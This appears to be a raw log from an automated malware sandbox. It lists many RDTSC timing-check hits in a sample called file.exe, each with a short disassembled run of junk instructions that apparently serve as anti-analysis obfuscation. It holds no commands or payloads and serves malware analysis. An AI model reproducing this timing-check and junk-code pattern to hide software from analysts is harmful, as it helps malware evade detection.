Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7250D75 second address: 7250DA4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8078BD3399h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebx+78h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F8078BD338Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7250DA4 second address: 7250DB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F80798BCE5Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7250DB4 second address: 7250DF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8078BD338Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push 00000001h 0x0000000d jmp 00007F8078BD3396h 0x00000012 nop 0x00000013 jmp 00007F8078BD3390h 0x00000018 push eax 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c mov edx, 5E001D32h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7250EB7 second address: 7250EC6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F80798BCE5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7250EC6 second address: 7250EEB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8078BD3399h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edi, edi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push edx 0x0000000f pop eax 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7250EEB second address: 7250EFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F80798BCE5Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7250EFD second address: 7250F01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7250F01 second address: 7250F2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F80E746B606h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov dl, cl 0x00000013 jmp 00007F80798BCE65h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7250F2A second address: 7250F9A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F8078BD3397h 0x00000009 add al, FFFFFFDEh 0x0000000c jmp 00007F8078BD3399h 0x00000011 popfd 0x00000012 mov esi, 253C51A7h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov eax, dword ptr [ebp-04h] 0x0000001d jmp 00007F8078BD338Ah 0x00000022 mov dword ptr [esi+08h], eax 0x00000025 jmp 00007F8078BD3390h 0x0000002a lea eax, dword ptr [ebx+70h] 0x0000002d pushad 0x0000002e mov di, cx 0x00000031 popad 0x00000032 push 00000001h 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7250F9A second address: 7250FA0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7250FA0 second address: 7250FA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7250FA6 second address: 7250FAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7250FAA second address: 7250FE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F8078BD338Fh 0x00000012 or ah, FFFFFFAEh 0x00000015 jmp 00007F8078BD3399h 0x0000001a popfd 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7250FE4 second address: 7250FEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7250FEA second address: 7250FEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7250FEE second address: 725103A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b jmp 00007F80798BCE5Fh 0x00000010 lea eax, dword ptr [ebp-18h] 0x00000013 pushad 0x00000014 mov bl, ah 0x00000016 mov cx, dx 0x00000019 popad 0x0000001a push esi 0x0000001b jmp 00007F80798BCE68h 0x00000020 mov dword ptr [esp], eax 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 mov ebx, 14EE4CD0h 0x0000002b movsx ebx, ax 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7251073 second address: 7251079 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7251079 second address: 725108A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F80798BCE5Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 725108A second address: 72510F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edi, eax 0x0000000a pushad 0x0000000b call 00007F8078BD3393h 0x00000010 call 00007F8078BD3398h 0x00000015 pop ecx 0x00000016 pop edx 0x00000017 jmp 00007F8078BD3390h 0x0000001c popad 0x0000001d test edi, edi 0x0000001f jmp 00007F8078BD3390h 0x00000024 js 00007F80E6781950h 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72510F1 second address: 72510F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72510F5 second address: 72510FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72510FB second address: 7251101 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7251101 second address: 725112B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebp-14h] 0x0000000b jmp 00007F8078BD338Ah 0x00000010 mov ecx, esi 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 jmp 00007F8078BD338Dh 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 725112B second address: 7251198 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, dx 0x00000006 pushfd 0x00000007 jmp 00007F80798BCE69h 0x0000000c xor cx, 6446h 0x00000011 jmp 00007F80798BCE61h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov dword ptr [esi+0Ch], eax 0x0000001d jmp 00007F80798BCE5Eh 0x00000022 mov edx, 74E806ECh 0x00000027 pushad 0x00000028 mov edi, eax 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F80798BCE68h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7251198 second address: 7251203 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 sub eax, eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F8078BD3393h 0x00000010 or esi, 2D440D8Eh 0x00000016 jmp 00007F8078BD3399h 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007F8078BD3390h 0x00000022 or ax, 0008h 0x00000027 jmp 00007F8078BD338Bh 0x0000002c popfd 0x0000002d popad 0x0000002e lock cmpxchg dword ptr [edx], ecx 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7251203 second address: 725121E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F80798BCE67h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 725121E second address: 7251254 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8078BD3399h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a jmp 00007F8078BD338Eh 0x0000000f test eax, eax 0x00000011 pushad 0x00000012 movzx eax, di 0x00000015 push eax 0x00000016 push edx 0x00000017 push ebx 0x00000018 pop eax 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7251254 second address: 72512FC instructions: 0x00000000 rdtsc 0x00000002 mov si, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 jne 00007F80E746B2D6h 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F80798BCE5Dh 0x00000015 adc ax, B496h 0x0000001a jmp 00007F80798BCE61h 0x0000001f popfd 0x00000020 push eax 0x00000021 call 00007F80798BCE67h 0x00000026 pop ecx 0x00000027 pop edx 0x00000028 popad 0x00000029 mov edx, dword ptr [ebp+08h] 0x0000002c jmp 00007F80798BCE64h 0x00000031 mov eax, dword ptr [esi] 0x00000033 pushad 0x00000034 push eax 0x00000035 push ebx 0x00000036 pop esi 0x00000037 pop edi 0x00000038 push eax 0x00000039 movsx edx, si 0x0000003c pop esi 0x0000003d popad 0x0000003e mov dword ptr [edx], eax 0x00000040 pushad 0x00000041 mov eax, edx 0x00000043 push eax 0x00000044 push edx 0x00000045 pushfd 0x00000046 jmp 00007F80798BCE65h 0x0000004b add ecx, 758ACB66h 0x00000051 jmp 00007F80798BCE61h 0x00000056 popfd 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72512FC second address: 725131D instructions: 0x00000000 rdtsc 0x00000002 call 00007F8078BD3390h 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [esi+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov ch, 5Ch 0x00000013 mov eax, ebx 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 725131D second address: 725133C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, 3A4Dh 0x00000007 movzx eax, di 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [edx+04h], eax 0x00000010 pushad 0x00000011 mov ecx, edx 0x00000013 movsx edi, cx 0x00000016 popad 0x00000017 mov eax, dword ptr [esi+08h] 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d mov bl, ch 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 725133C second address: 7251347 instructions: 0x00000000 rdtsc 0x00000002 mov bx, A062h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7251518 second address: 725151C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 725151C second address: 7251520 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7251520 second address: 7251526 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7251526 second address: 7251535 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8078BD338Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7251535 second address: 72515F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+24h] 0x0000000b jmp 00007F80798BCE65h 0x00000010 mov dword ptr [edx+24h], eax 0x00000013 pushad 0x00000014 jmp 00007F80798BCE5Ch 0x00000019 mov di, cx 0x0000001c popad 0x0000001d mov eax, dword ptr [esi+28h] 0x00000020 jmp 00007F80798BCE5Ch 0x00000025 mov dword ptr [edx+28h], eax 0x00000028 jmp 00007F80798BCE60h 0x0000002d mov ecx, dword ptr [esi+2Ch] 0x00000030 pushad 0x00000031 pushfd 0x00000032 jmp 00007F80798BCE5Eh 0x00000037 adc ecx, 03549B68h 0x0000003d jmp 00007F80798BCE5Bh 0x00000042 popfd 0x00000043 pushfd 0x00000044 jmp 00007F80798BCE68h 0x00000049 xor si, EDC8h 0x0000004e jmp 00007F80798BCE5Bh 0x00000053 popfd 0x00000054 popad 0x00000055 mov dword ptr [edx+2Ch], ecx 0x00000058 pushad 0x00000059 push eax 0x0000005a push edx 0x0000005b call 00007F80798BCE62h 0x00000060 pop esi 0x00000061 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72515F4 second address: 7251644 instructions: 0x00000000 rdtsc 0x00000002 call 00007F8078BD338Bh 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ax, bx 0x0000000d popad 0x0000000e mov ax, word ptr [esi+30h] 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov dl, ah 0x00000017 pushfd 0x00000018 jmp 00007F8078BD3399h 0x0000001d sub ecx, 353596F6h 0x00000023 jmp 00007F8078BD3391h 0x00000028 popfd 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7251644 second address: 725170F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F80798BCE61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov word ptr [edx+30h], ax 0x0000000d pushad 0x0000000e mov cl, 83h 0x00000010 pushfd 0x00000011 jmp 00007F80798BCE69h 0x00000016 adc cl, FFFFFFB6h 0x00000019 jmp 00007F80798BCE61h 0x0000001e popfd 0x0000001f popad 0x00000020 mov ax, word ptr [esi+32h] 0x00000024 pushad 0x00000025 push esi 0x00000026 mov ax, di 0x00000029 pop edx 0x0000002a mov di, ax 0x0000002d popad 0x0000002e mov word ptr [edx+32h], ax 0x00000032 pushad 0x00000033 pushfd 0x00000034 jmp 00007F80798BCE5Ch 0x00000039 xor esi, 21004C08h 0x0000003f jmp 00007F80798BCE5Bh 0x00000044 popfd 0x00000045 jmp 00007F80798BCE68h 0x0000004a popad 0x0000004b mov eax, dword ptr [esi+34h] 0x0000004e pushad 0x0000004f movzx ecx, dx 0x00000052 mov ebx, 1C41BCFEh 0x00000057 popad 0x00000058 mov dword ptr [edx+34h], eax 0x0000005b jmp 00007F80798BCE65h 0x00000060 test ecx, 00000700h 0x00000066 push eax 0x00000067 push edx 0x00000068 pushad 0x00000069 movsx edi, si 0x0000006c mov cl, E7h 0x0000006e popad 0x0000006f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 725170F second address: 725175B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F8078BD338Ch 0x00000009 sbb eax, 4530C328h 0x0000000f jmp 00007F8078BD338Bh 0x00000014 popfd 0x00000015 call 00007F8078BD3398h 0x0000001a pop ecx 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e jne 00007F80E6781350h 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 mov ch, 1Dh 0x00000029 push edx 0x0000002a pop esi 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 725175B second address: 7251823 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F80798BCE60h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 or dword ptr [edx+38h], FFFFFFFFh 0x0000000d jmp 00007F80798BCE60h 0x00000012 or dword ptr [edx+3Ch], FFFFFFFFh 0x00000016 pushad 0x00000017 push esi 0x00000018 mov si, dx 0x0000001b pop edx 0x0000001c pushfd 0x0000001d jmp 00007F80798BCE66h 0x00000022 or esi, 439DF578h 0x00000028 jmp 00007F80798BCE5Bh 0x0000002d popfd 0x0000002e popad 0x0000002f or dword ptr [edx+40h], FFFFFFFFh 0x00000033 pushad 0x00000034 jmp 00007F80798BCE64h 0x00000039 pushfd 0x0000003a jmp 00007F80798BCE62h 0x0000003f sbb eax, 77E49F08h 0x00000045 jmp 00007F80798BCE5Bh 0x0000004a popfd 0x0000004b popad 0x0000004c pop esi 0x0000004d pushad 0x0000004e mov di, cx 0x00000051 pushfd 0x00000052 jmp 00007F80798BCE60h 0x00000057 xor ecx, 163C4168h 0x0000005d jmp 00007F80798BCE5Bh 0x00000062 popfd 0x00000063 popad 0x00000064 pop ebx 0x00000065 pushad 0x00000066 push eax 0x00000067 push edx 0x00000068 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7251823 second address: 7251873 instructions: 0x00000000 rdtsc 0x00000002 call 00007F8078BD3391h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushfd 0x0000000b jmp 00007F8078BD3391h 0x00000010 sub cx, 5A36h 0x00000015 jmp 00007F8078BD3391h 0x0000001a popfd 0x0000001b popad 0x0000001c leave 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F8078BD338Dh 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7251873 second address: 7251883 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F80798BCE5Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7280411 second address: 728045F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F8078BD3398h 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007F8078BD338Bh 0x00000011 xchg eax, ebp 0x00000012 pushad 0x00000013 movzx esi, dx 0x00000016 mov dx, 52D4h 0x0000001a popad 0x0000001b mov ebp, esp 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F8078BD3396h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7230AF0 second address: 7230AF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7230AF4 second address: 7230AF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7230AF8 second address: 7230AFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71F0020 second address: 71F0024 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71F0024 second address: 71F002A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71F002A second address: 71F0030 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71F0030 second address: 71F0034 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71F0034 second address: 71F007B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F8078BD338Bh 0x0000000e xchg eax, ebp 0x0000000f jmp 00007F8078BD3396h 0x00000014 mov ebp, esp 0x00000016 jmp 00007F8078BD3390h 0x0000001b pop ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f pushad 0x00000020 popad 0x00000021 movsx ebx, ax 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71F007B second address: 71F0081 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71F0081 second address: 71F0085 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71F0656 second address: 71F0690 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F80798BCE69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F80798BCE68h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71F0690 second address: 71F0694 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71F0694 second address: 71F069A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71F069A second address: 71F06BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8078BD338Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8078BD338Eh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71F0A56 second address: 71F0A5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71F0A5C second address: 71F0A73 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a mov esi, edx 0x0000000c mov ch, dl 0x0000000e popad 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71F0A73 second address: 71F0A79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71F0A79 second address: 71F0A7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72309CD second address: 72309D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72309D3 second address: 72309EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F8078BD338Dh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72309EB second address: 72309F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72309F1 second address: 7230A1F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F8078BD338Fh 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F8078BD3390h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7230A1F second address: 7230A2E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F80798BCE5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7230A2E second address: 7230A34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7230A34 second address: 7230A38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7230A38 second address: 7230A4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F8078BD338Ah 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 722002C second address: 722003B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F80798BCE5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 722003B second address: 72200A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov dl, FDh 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c mov edx, 57CDE7B0h 0x00000011 pushfd 0x00000012 jmp 00007F8078BD3399h 0x00000017 sub eax, 2A1AAB36h 0x0000001d jmp 00007F8078BD3391h 0x00000022 popfd 0x00000023 popad 0x00000024 xchg eax, ebp 0x00000025 jmp 00007F8078BD338Eh 0x0000002a mov ebp, esp 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F8078BD3397h 0x00000033 rdtsc
